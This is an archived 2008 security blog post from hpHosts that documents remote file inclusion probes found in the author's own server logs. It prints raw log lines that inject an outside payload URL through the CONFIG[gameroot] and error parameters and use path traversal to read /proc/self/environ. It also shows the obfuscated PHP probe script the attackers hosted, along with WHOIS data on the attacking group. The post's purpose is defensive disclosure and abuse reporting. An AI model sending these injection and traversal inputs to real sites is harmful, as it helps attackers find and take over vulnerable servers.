Blog for hpHosts, and whatever else I feel like writing about ....

Friday 12 September 2008

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang

I've been seeing this in RFI attacks lately, and even documented such on the blog;

http://hphosts.blogspot.com/2008/09/alas-another-exploit-attempt-rfiphp.html

Quite why the blog isn't displaying on IE/Avant properly escapes me, but that's another matter.

I've found this one again in todays yesterdays server logs (attacker: 195.135.183.134 - mail3.caris.de);

2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:56 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:57 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:57 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 195.135.183.134 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0
2008-09-12 19:13:58 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 195.135.183.134 - mysteryfcm.co.uk 200 0 0


.. and from todays log (attacker: 83.220.144.22 - webbox442.server-home.org);


2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:02 GET /server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:02 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 83.220.144.22 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0
2008-09-13 02:57:03 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 83.220.144.22 - mysteryfcm.co.uk 200 0 0


... and ....

Attacker: 193.33.20.246 (k10751109.custservers.inetgate.net)
Attacker: 85.214.58.39 (ap2000.de)


2008-09-13 00:36:34 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:34 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:35 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:35 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:36 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 193.33.20.246 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:36 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 193.33.20.246 - mysteryfcm.co.uk 200 0 0

2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /misc/cyberdefender/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /misc/cyberdefender/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:48 GET /qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:48 GET /errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 3
2008-09-13 00:36:49 GET /misc/errors.php error=http://www.jfc.info/jfcinfo/grafiken/i??? 80 - 85.214.58.39 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0
2008-09-13 00:36:49 GET /misc/qlib/smarty.inc.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 85.214.58.39 - mysteryfcm.co.uk 200 0 0


The RFI at the following has been reported to their host and owner;

http://www.jfc.info/jfcinfo/grafiken/i???

... and contains;


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://www.jfc.info/jfcinfo/grafiken/i???
Server IP: 89.238.65.54 [ server1.jfc.info ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 13 September 2008
Time: 09:42:15:42
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


As documented previously, thanks to the help of the ISC, this exploit attempt seems to indicate that they're trying to determine which servers spit out "echo cr4nk rocks", which then indicates the server is vulnerable to attack.

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-02-16
Domain Currently Expires: 2009-02-16

Current Nameservers:

dns1.public-dns.net
dns2.public-dns.net
dns3.public-dns.net


Servers IP: 67.225.157.104

OrgName: Liquid Web, Inc.
OrgID: LQWB
Address: 4210 Creyts Rd.
City: Lansing
StateProv: MI
PostalCode: 48917
Country: US

ReferralServer: rwhois://rwhois.liquidweb.com:4321/

NetRange: 67.225.128.0 - 67.225.255.255
CIDR: 67.225.128.0/17
OriginAS: AS32244
NetName: LIQUIDWEB-8
NetHandle: NET-67-225-128-0-1
Parent: NET-67-0-0-0-0
NetType: Direct Allocation
NameServer: NS.LIQUIDWEB.COM
NameServer: NS1.LIQUIDWEB.COM
Comment:
RegDate: 2007-11-26
Updated: 2008-01-23

OrgAbuseHandle: ABUSE551-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-800-580-4985
OrgAbuseEmail: abuse@liquidweb.com

OrgTechHandle: IPADM47-ARIN
OrgTechName: IP Administrator
OrgTechPhone: +1-800-580-4985
OrgTechEmail: ipadmin@liquidweb.com


Update: Added attacks from todays server logs
Update 2: Added formatting for code div's to stop 'em going too long
Posted by MysteryFCM at 22:47

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)